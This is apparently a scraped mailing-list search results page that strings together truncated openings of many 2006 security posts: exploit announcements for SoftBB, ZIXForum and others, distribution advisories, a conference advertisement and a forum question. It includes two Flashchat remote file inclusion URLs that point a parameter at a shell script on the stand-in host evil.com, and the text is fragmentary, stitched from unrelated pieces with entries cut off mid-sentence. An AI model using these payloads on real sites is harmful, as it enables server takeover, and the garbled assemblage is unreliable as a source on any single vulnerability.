# SoftBB v0.1 = Cross-Site Scripting - XSS Exploit ;
# Discovred By : ThE__LeO[Mor0Ccan Islam DefenDers Team] ;
# Software : SoftBB ;
# Version : 0.1 ;
# Site Of Software : Www.Softbb.Be ;
# Exploit :
Hello everybody HITBSecConf2006 - Malaysia is only 13 days away and we
will be having loads of speakers down to give talks and presentations on
highly interesting topics, so why don't you register now @
http://conference.hitb.org/hitbsecconf2006kl. Come and experience Asia's
Largest Security
===
Ubuntu Security Notice USN-339-1 September 05, 2006
openssl vulnerability
CVE-2006-4339
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
===
Ubuntu Security Notice USN-338-1 September 05, 2006
mysql-dfsg-5.0 vulnerabilities
CVE-2006-4031, CVE-2006-4227
===
A security issue affects the following Ubuntu releases:
New FAQ document about the recently discovered 0-day vulnerability in Microsoft
Word is available.
This vulnerability has been reported especially in Office 2000 on Windows 2000
machines.
Possible other Office versions are affected as well.
This vulnerability is being exploited by Trojan from
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1169-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 5th, 2006
* Kurdish Security Advisory
* Original Advisory :
http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html
* Script : GrapAgenda
* Site : http://www.graphiks.net
* Version : 0.1
* Risk : High
* Class : Remote
* Contact : [EMAIL PROTECTED] and irc.gigachat.net
#SolpotCrew
Community
#
#AlstraSoft Template Seller Remote File Include Vulnerability
#
#Download file : http://www.alstrasoft.com/template.htm
#
[EMAIL PROTECTED] wrote:
-Description---
$cutepath = __FILE__;
$cutepath = preg_replace( '\\\search\.php', , $cutepath);
$cutepath = preg_replace( '/search\.php', , $cutepath);
require_once($cutepath/inc/functions.inc.php);
* Kurdish Security Advisory
* Original Adv :
http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html
* Script : AnnonceV
* Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
* Version : 1.1
* Risk : High
* Class : Remote
* Contact : [EMAIL
####
## ©ZIXForum 1.12 = RepId Remote SQL Injection##
## - - - - - - - - - - - - - - - - - - - - - - - - - -
A buffer overflow in variable 'buf' exists due to insufficient validation
of variable 'name' in function tor_resolve line 218 of software at
http://www.monkey.org/~dugsong/dsocks/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [UPDATE] GLSA 200509-09:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
I found that AuditWizard 6.3.2 by Layton Technologies
is leaving the domain administrator password in the
logfiles of machines that it audits if you use the
Remote Audit feature.
I've contacted them but they have yet to produce a
fix. They have acknowledged the problem but according
to their
Qemu 0.8.2 is also effected by this issue, so the POC code can also be used to
detect virtualisation.
Nither bochs nor vmware are effected.
NeXtMaN mc.nadz [at] gmail.com
Here are 2 RFI vulnerabilities in Flashchat i've found:
Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
video here:
rPath Security Advisory: 2006-0163-1
Published: 2006-09-05
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote Deterministic Unauthorized Access
Updated Versions:
openssl=/[EMAIL PROTECTED]:devel//1/0.9.7f-10.3-1
openssl-scripts=/[EMAIL
#=
#in-link =2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit
#
#
#Critical Level :
Easy Address Book Web Server Format String Vulnerability
Software: Easy Address Book Web Server
Version: 1.2
Website: http://www.efssoft.com/
Description:
Easy Address Book Web Server is a Web Address Book software that allows users
to view, search, add, edit, or administer address books
#==
#Dyn CMS = REleased (x_admindir) Remote File Inclusion Exploit
#===
#
By the way i'm using the progress control shatter exploit by brett mooore, but
i'm having problem with
the setHandler (critical address to overwrite) and shellcodeaddr (data space to
inject the code). Probably they are windows dependent. Do you know if there is
the possibility to write a
21 matches
Mail list logo